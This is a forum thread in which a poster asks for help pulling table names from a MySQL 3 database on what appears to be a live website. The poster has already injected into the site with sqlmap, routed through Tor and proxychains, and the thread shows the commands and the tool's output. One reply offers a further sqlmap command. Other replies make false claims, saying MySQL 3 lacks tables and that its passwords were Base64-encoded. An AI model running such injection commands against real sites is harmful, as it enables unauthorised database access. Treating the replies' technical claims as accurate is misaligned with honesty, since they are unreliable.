Forum Thread: How to -help --Getting Tables from DBS Running MySQL 3

How to -help --Getting Tables from DBS Running MySQL 3

Hello friends,

during my study of databases i ran into a problem. I successfully got list of databases using sqlmap. But when i try to get tables from any database listed i'm going to get an error. I did some research of this error and found out, that it is because there is not an information schema db. But i have not find any solution yet. So i'm asking your clever minds to help me with this challenge. Here is a list of commands i ran:

# service tor start
ok Starting tor daemon...done.
# proxychains sqlmap -u http://www.somesite.com/detail.php?ID=1 --dbs

# proxychains sqlmap -u http://www.somesite.com/detail.php?ID=1-D somedb --tables

INFO the back-end DBMS is MySQL
web server operating system: Linux CentOS 4.9
web application technology: PHP 4.3.9, Apache 2.0.52
back-end DBMS: MySQL 3
16:31:00 ERROR informationschema not available, back-end DBMS is MySQL < 5.0
do you want to use common table existence check? y/N/q

#y

It ran a table existence check with no results.
So what now?

Thank you for answers and help.

4 Responses

from what i can find, it seems that sql 3 does not support tables, I really do not know how to help you lol.

That is a very old version of mysql. The current version is 5.7.

The good news is that passwords in mysql back then used Base64 encoding , so they are very easy to crack. Also, that old version of mysql has numerous security vulnerabilities. Check them out in one of the vulnerability databases.

OTW

Tried this?

sqlmap -u http://somerandomsite/index.php?id=1 -v 1 --curre
nt-db --current-user

Good luck after that..
"For the moment no table/column
enumeration is possible on MySQL < 5.0 even if you provide the DB
name.

Cheers,
--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com"

So take a different path ^^

Share Your Thoughts

  • Hot
  • Active